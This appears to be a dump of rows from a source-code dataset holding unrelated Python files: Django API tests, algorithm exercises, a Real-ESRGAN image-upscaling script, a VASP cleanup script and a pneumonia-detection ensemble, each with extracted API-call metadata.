sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
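# Illustrative usage (a sketch: it assumes the api_level/ font tree and the
# populated emoji_support.csv cache described above are available):
#
#   summary = font_summary()            # per-API-level file counts and sizes
#   per_font, per_level = emoji_summary()
#   print(summary.tail())
#   print(per_level.tail())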
| [((6, 21, 6, 56), 'emoji.datafile', 'emoji.datafile', ({(6, 36, 6, 55): '"""emoji_support.csv"""'}, {}), "('emoji_support.csv')", False, 'import emoji\n'), ((45, 11, 45, 33), 'os.path.splitext', 'os.path.splitext', ({(45, 28, 45, 32): 'file'}, {}), '(file)', False, 'import os\n'), ((50, 27, 50, 47), 'os.walk', 'os.walk', ({(50, 35, 50, 46): '"""api_level"""'}, {}), "('api_level')", False, 'import os\n'), ((57, 7, 57, 28), 'pandas.DataFrame', 'pd.DataFrame', ({(57, 20, 57, 27): 'records'}, {}), '(records)', True, 'import pandas as pd\n'), ((68, 9, 68, 43), 'os.path.isfile', 'os.path.isfile', ({(68, 24, 68, 42): '_SUPPORT_CACHE_CSV'}, {}), '(_SUPPORT_CACHE_CSV)', False, 'import os\n'), ((70, 10, 70, 82), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((53, 20, 53, 44), 'os.path.join', 'os.path.join', ({(53, 33, 53, 37): 'root', (53, 39, 53, 43): 'file'}, {}), '(root, file)', False, 'import os\n'), ((93, 16, 93, 32), 'emoji.metadata', 'emoji.metadata', ({}, {}), '()', False, 'import emoji\n'), ((54, 24, 54, 46), 'os.path.basename', 'os.path.basename', ({(54, 41, 54, 45): 'root'}, {}), '(root)', False, 'import os\n'), ((55, 15, 55, 33), 'os.stat', 'os.stat', ({(55, 23, 55, 32): 'full_file'}, {}), '(full_file)', False, 'import os\n')] |
amikrop/django-paste | tests/test_list.py | 109f6e5a42bdc20f3cb671471b3ce5c9e329148b | import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
        the LIST_FOREIGN setting is False, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| [((19, 15, 19, 38), 'django.urls.reverse', 'reverse', ({(19, 23, 19, 37): '"""snippet-list"""'}, {}), "('snippet-list')", False, 'from django.urls import reverse\n'), ((32, 8, 32, 29), 'tests.utils.create_snippet', 'create_snippet', ({(32, 23, 32, 28): '"""foo"""'}, {}), "('foo')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((33, 8, 33, 29), 'tests.utils.create_snippet', 'create_snippet', ({(33, 23, 33, 28): '"""bar"""'}, {}), "('bar')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((44, 16, 44, 36), 'tests.utils.create_user', 'create_user', ({(44, 28, 44, 35): '"""owner"""'}, {}), "('owner')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((45, 8, 45, 56), 'tests.utils.create_snippet', 'create_snippet', (), '', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((58, 8, 58, 29), 'tests.utils.create_snippet', 'create_snippet', ({(58, 23, 58, 28): '"""foo"""'}, {}), "('foo')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((59, 8, 59, 46), 'tests.utils.create_snippet', 'create_snippet', (), '', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((66, 13, 66, 44), 'tests.utils.constant', 'constant', ({(66, 22, 66, 36): '"""LIST_FOREIGN"""', (66, 38, 66, 43): '(False)'}, {}), "('LIST_FOREIGN', False)", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((130, 13, 130, 30), 'tests.utils.constant', 'constant', ({(130, 22, 130, 29): 'setting'}, {}), '(setting)', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((27, 29, 27, 47), 'json.dumps', 'json.dumps', ({(27, 40, 27, 46): 'kwargs'}, {}), '(kwargs)', False, 'import json\n')] |
ganeshbhandarkar/Python-Projects | Algorithmic Toolbox/Greedy Algorithms/Maximum Advertisement Revenue/maximum_ad_revenue.py | a4df933122a6694d249c69d1e8e95b592cf036a0 | # python3
from itertools import permutations
def max_dot_product_naive(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
max_product = 0
for permutation in permutations(second_sequence):
dot_product = sum(first_sequence[i] * permutation[i] for i in range(len(first_sequence)))
max_product = max(max_product, dot_product)
return max_product
def max_dot_product(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
    # Greedy solution: by the rearrangement inequality, pairing the largest
    # price with the largest click count maximizes the dot product.
    return sum(f * s for f, s in
               zip(sorted(first_sequence), sorted(second_sequence)))
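# Worked example of the greedy pairing: for prices [2, 3, 9] and clicks
# [7, 4, 2], sorting both ascending pairs 2*2 + 3*4 + 9*7 = 79, which is the
# same value max_dot_product_naive finds by trying every permutation.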
if __name__ == '__main__':
n = int(input())
prices = list(map(int, input().split()))
clicks = list(map(int, input().split()))
assert len(prices) == len(clicks) == n
print(max_dot_product(prices, clicks))
| [] |
SamIge7/Tutorials | HelloWorldPython/IfStatements.py | 7a3361768432a6493313d1f0ea1ccc8b2b916aa2 | hasGoodCredit = True
price = 1000000
deposit = 0
if hasGoodCredit:
deposit = price/10
else:
deposit = price/5
print(f"Deposit needed: £{deposit}") | [] |
vsundesha/documentation-hub-dependencies | main.py | 3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01 | import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
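# Example invocation (owner/repo names are placeholders):
#   python main.py --owner <owner> --repo <repository> -f report
# which writes the dependency data to "report" + "dependecies.json"
# (or to <OWNER><REPOSITORY>dependecies.json when -f is omitted).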
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
        # opts holds the parsed (option, value) pairs; remainder holds any arguments left over after parsing
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| [((26, 26, 27, 64), 'getopt.getopt', 'getopt.getopt', ({(27, 12, 27, 16): 'argv', (27, 18, 27, 27): '"""hr:o:f:"""', (27, 29, 27, 63): "['repo=', 'owner=', 'outputfile=']"}, {}), "(argv, 'hr:o:f:', ['repo=', 'owner=', 'outputfile='])", False, 'import getopt\n'), ((44, 15, 44, 58), 'GitHubDataFetcher.GitHubDataFetcher', 'GitHubDataFetcher', ({(44, 33, 44, 38): 'OWNER', (44, 40, 44, 50): 'REPOSITORY', (44, 52, 44, 57): 'TOKEN'}, {}), '(OWNER, REPOSITORY, TOKEN)', False, 'from GitHubDataFetcher import GitHubDataFetcher\n'), ((30, 8, 30, 19), 'sys.exit', 'sys.exit', ({(30, 17, 30, 18): '(2)'}, {}), '(2)', False, 'import sys\n'), ((34, 12, 34, 22), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n')] |
blabra/Real-ESRGAN | inference_realesrgan.py | bd5c69d2ef30f27cc2a510443451a2dc841aec28 | import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
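    # Example invocation (input/output paths are placeholders); every flag
    # maps to an argument defined on the parser above:
    #   python inference_realesrgan.py -i inputs -n RealESRGAN_x4plus -o results --half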
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| [((15, 13, 15, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((71, 17, 71, 88), 'os.path.join', 'os.path.join', ({(71, 30, 71, 61): '"""experiments/pretrained_models"""', (71, 63, 71, 87): "args.model_name + '.pth'"}, {}), "('experiments/pretrained_models', args.model_name + '.pth')", False, 'import os\n'), ((78, 16, 85, 23), 'realesrgan.RealESRGANer', 'RealESRGANer', (), '', False, 'from realesrgan import RealESRGANer\n'), ((95, 4, 95, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((97, 7, 97, 33), 'os.path.isfile', 'os.path.isfile', ({(97, 22, 97, 32): 'args.input'}, {}), '(args.input)', False, 'import os\n'), ((48, 16, 48, 102), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((72, 11, 72, 37), 'os.path.isfile', 'os.path.isfile', ({(72, 26, 72, 36): 'model_path'}, {}), '(model_path)', False, 'import os\n'), ((73, 21, 73, 81), 'os.path.join', 'os.path.join', ({(73, 34, 73, 54): '"""realesrgan/weights"""', (73, 56, 73, 80): "args.model_name + '.pth'"}, {}), "('realesrgan/weights', args.model_name + '.pth')", False, 'import os\n'), ((74, 11, 74, 37), 'os.path.isfile', 'os.path.isfile', ({(74, 26, 74, 36): 'model_path'}, {}), '(model_path)', False, 'import os\n'), ((89, 24, 94, 35), 'gfpgan.GFPGANer', 'GFPGANer', (), '', False, 'from gfpgan import GFPGANer\n'), ((103, 20, 103, 39), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((107, 14, 107, 52), 'cv2.imread', 'cv2.imread', ({(107, 25, 107, 29): 'path', (107, 31, 107, 51): 'cv2.IMREAD_UNCHANGED'}, {}), '(path, cv2.IMREAD_UNCHANGED)', False, 'import cv2\n'), ((119, 20, 119, 85), 'os.path.join', 'os.path.join', ({(119, 33, 119, 44): 'args.output', (119, 46, 119, 84): 'f"""{imgname}-{args.suffix}.{extension}"""'}, {}), "(args.output, f'{imgname}-{args.suffix}.{extension}')", False, 'import os\n'), ((120, 11, 120, 36), 'os.path.exists', 'os.path.exists', ({(120, 26, 120, 35): 'save_path'}, {}), '(save_path)', False, 'import os\n'), ((51, 16, 51, 101), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((104, 46, 104, 68), 'os.path.basename', 'os.path.basename', ({(104, 63, 104, 67): 'path'}, {}), '(path)', False, 'import os\n'), ((132, 12, 132, 42), 'cv2.imwrite', 'cv2.imwrite', ({(132, 24, 132, 33): 'save_path', (132, 35, 132, 41): 'output'}, {}), '(save_path, output)', False, 'import cv2\n'), ((54, 16, 54, 102), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((100, 33, 100, 62), 'os.path.join', 'os.path.join', ({(100, 46, 100, 56): 'args.input', (100, 58, 100, 61): '"""*"""'}, {}), "(args.input, '*')", False, 'import os\n'), ((59, 16, 59, 113), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', (), '', False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((64, 16, 64, 113), 'realesrgan.archs.srvgg_arch.SRVGGNetCompact', 'SRVGGNetCompact', (), '', False, 'from realesrgan.archs.srvgg_arch import SRVGGNetCompact\n'), ((67, 16, 67, 101), 'basicsr.archs.rrdbnet_arch.RRDBNet', 'RRDBNet', (), '', False, 'from basicsr.archs.rrdbnet_arch import RRDBNet\n'), ((133, 62, 133, 81), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n')] |
eragasa/pypospack | examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| [((23, 8, 23, 27), 'os.remove', 'os.remove', ({(23, 18, 23, 26): 'filename'}, {}), '(filename)', False, 'import os\n')] |
ethyl2/code_challenges | binary_trees/largest_values_in_tree_rows.py | 3c9ccca1782f92728e60a515a7ca797f6d470e81 | '''
Sean Chen's solution.
See mine in largest_values_in_each_row.py
'''
from collections import deque
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
        # `current_depth`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
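# Minimal usage sketch (assumes a simple node type with `value`, `left` and
# `right` attributes, which is all the function relies on):
#
#   class Node:
#       def __init__(self, value, left=None, right=None):
#           self.value, self.left, self.right = value, left, right
#
#   tree = Node(3, Node(9), Node(20, Node(15), Node(7)))
#   largest_values_in_tree_rows(tree)  # -> [3, 20, 15]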
| [((17, 8, 17, 15), 'collection.deque', 'deque', ({}, {}), '()', False, 'from collection import deque\n')] |
RamsteinWR/PneumoniaRSNA1 | src/infer/_ExtractSimpleDeformTTA.py | 08bdba51292307a78ef711c6be4a63faea240ddf | import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
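# Worked example: for the 1024-pixel-wide images assumed by the constant
# above, a box with x1=100, y1=50, w=200, h=300 has its top-right corner at
# x=300, so the horizontally flipped box starts at x1 = 1024 - 300 = 724:
#   flip_box([100, 50, 200, 300])  # -> [724.0, 50, 200, 300]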
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize, fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
execfile(os.path.join(WDIR, "DetectionEnsemble.py"))
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
